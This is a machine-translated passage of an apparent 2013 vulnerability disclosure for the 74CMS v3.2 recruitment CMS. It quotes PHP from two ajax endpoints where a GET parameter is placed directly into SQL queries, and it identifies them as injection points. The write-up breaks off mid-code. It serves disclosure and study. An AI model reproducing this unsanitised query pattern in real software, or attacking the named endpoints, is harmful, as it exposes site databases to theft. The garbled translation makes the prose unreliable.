74CMS talent system v3. 2 injection& full version pass rounded out the background-bug warning-the black bar safety net

2013-05-31T00:00:00
ID MYHACK58:62201339045
Type myhack58
Reporter 佚名
Modified 2013-05-31T00:00:00

Description

Because a station with this system next to the station is also no start so went down the parts of the source code to read

Set of procedures filter is still relatively full, but all versions are GBK encoding is his flawed but basically the string into the library when the author used the iconv to convert the submitted over the data encoding into utf8

So the use of wide-character injection there is no way out but the filter perfect only 3. 2 version before the latest of the 3. 2 Version plus directory for more than a few files don't know if it changed programmer... first on the two idiots injection.~

Injection 1:

\plus\ajax_officebuilding.php (1 6 lines)

if($act == 'alphabet') { $alphabet=trim($_GET['x']); //grinning certainly is for the programmer not to explain if (! empty($alphabet)) { $result = $db->query("select * from ". table('category')." where c_alias='QS_officebuilding' AND c_index='{$alphabet}' "); //grinning while($row = $db->fetch_array($result)) { if ($listtype=="li") { $htm.="& lt;li title=\"{$row['c_name']}\" id=\"{$row['c_id']}\">{$row['c_name']}</li>"; } else { $htm.="& lt;li><a href=\"? officebuildingid={$row['c_id']}\" title=\"{$row['c_note']}\" class=\"vtip\">{$row['c_name']}</a><span>{$row['stat_jobs']}</span></li>"; } } if (empty($htm)) { $htm="<span class=\"noinfo\">not found in the first letter of the:<span>{$alphabet}</span> the Office of!& lt;/span>"; } $htm.="& lt;script type=\"text/javascript\"> vtip();</script>"; exit($htm); } }Injection 2: \plus\ajax_street.php (1 6 lines)

if($act == 'alphabet') { $alphabet=trim($_GET['x']); //almost above a to inject exactly the same not much to say if (! empty($alphabet)) { $result = $db->query("select * from ". table('category')." where c_alias='QS_street' AND c_index='{$alphabet}' ");//grinning while($row = $db->fetch_array($result)) { if ($listtype=="li") { $htm.="& lt;li title=\"{$row['c_name']}\" id=\"{$row['c_id']}\">{$row['c_name']}</li>"; } else {

[1] [2] [3] next